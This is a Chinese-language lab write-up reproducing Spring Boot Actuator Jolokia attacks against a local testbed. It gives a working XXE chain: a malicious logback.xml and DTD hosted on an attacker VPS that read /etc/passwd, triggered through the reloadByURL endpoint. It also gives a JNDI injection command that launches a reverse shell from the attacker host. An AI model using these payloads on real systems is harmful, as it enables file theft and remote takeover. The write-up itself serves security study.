0x00环境搭建

首先是复杂的环境搭建,采用的kali.

使用的github上一个老哥搭建的环境:

git clone https://github.com/veracode-research/actuator-testbed.git

然后在kali安装mvn环境。

省略。

接下来直接运行:

mvn install 
mvn spring-boot:run
kali切换jdk版本:update-alternatives --config java
kali默认带的用8和11可以直接换

然后访问localhost:8090:

1625398347451

为了方便复现,用本机访问然后开搞。

然后呢。使用eclipse anaylse工具查明文,还有一些接口查明文信息就不搞了。

0x01Jolokia漏洞利用XXE

漏洞开始一般是存在actuator路径,紧接着就是env信息泄露。然后就是jolokia:

访问:http://localhost:8090/jolokia/list

1625398709783

现在vps上创建logback.xml:

<?xml version="1.0" encoding="utf-8" ?>  
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://VPS-ip:8000/file.dtd">%remote;%int;]>  
<a>&trick;</a>  

然后创建file.dtd:

<!ENTITY % d SYSTEM "file:///etc/psswd">
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">

然后访问:

http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/vps!/logback.xml

成功xxe读取到/etc/passwd

1625399845566

0x02Jolokia漏洞利用(RCE)

直接用别人写好的JNDI工具:

JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "加密后的反弹shell命令" -A "起rmi服务器的vps ip"

1625538457601

然后使用刚刚一样的方法访问:

http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/ip:8000!/logback.xml